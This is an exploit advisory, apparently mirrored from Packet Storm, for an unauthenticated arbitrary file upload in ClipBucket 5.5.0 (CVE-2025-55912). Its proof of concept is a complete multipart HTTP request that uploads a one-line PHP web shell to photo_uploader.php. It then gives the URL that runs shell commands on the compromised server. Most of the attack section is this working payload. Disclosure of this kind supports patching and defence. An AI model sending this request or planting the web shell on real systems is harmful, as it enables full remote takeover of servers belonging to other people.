Exploit for 📄 ClipBucket 5.5.0 Shell Upload CVE-2025-55912

## https://sploitus.com/exploit?id=PACKETSTORM:211127
# Exploit Title: ClipBucket 5.5.0 - Arbitrary File Upload
    
    # Google Dork: N/A
    
    # Date: 2025-09-11
    
    # Exploit Author: Mukundsinh Solanki (r00td3str0y3r)
    
    # Vendor Homepage: https://clipbucket.com
    
    # Software Link: https://github.com/MacWarrior/clipbucket-v5
    
    # Version: <= 5.5.0
    
    # Tested on: Ubuntu 20.04 LTS, PHP 7.4
    
    # CVE: CVE-2025-55912
    
    ## Vulnerability Description:
    ClipBucket <= 5.5.0 suffers from an unauthenticated arbitrary file upload
    vulnerability in `upload/actions/photo_uploader.php`. Missing access
    controls and insufficient validation of uploaded files allow an attacker to
    upload a crafted PHP file and execute it remotely, leading to full remote
    code execution (RCE).
    
    ## PoC Request:
    
    POST /upload/actions/photo_uploader.php HTTP/1.1
    Host: victim.com
    Content-Type: multipart/form-data; boundary=----BOUND
    
    ------BOUND
    Content-Disposition: form-data; name="Filedata"; filename="shell.php"
    Content-Type: application/x-php
    
    <?php system($_GET['cmd']); ?>
    ------BOUND--
    
    
    The file is uploaded without authentication. The attacker can then access
    it:
    
    
    http://victim.com/files/photos/shell.php?cmd=id
    
    
    ## Impact:
    - Unauthenticated remote code execution (RCE)
    - Full compromise of target application and underlying server
    
    Regards,
    Mukundsinh Solanki
    +916355251151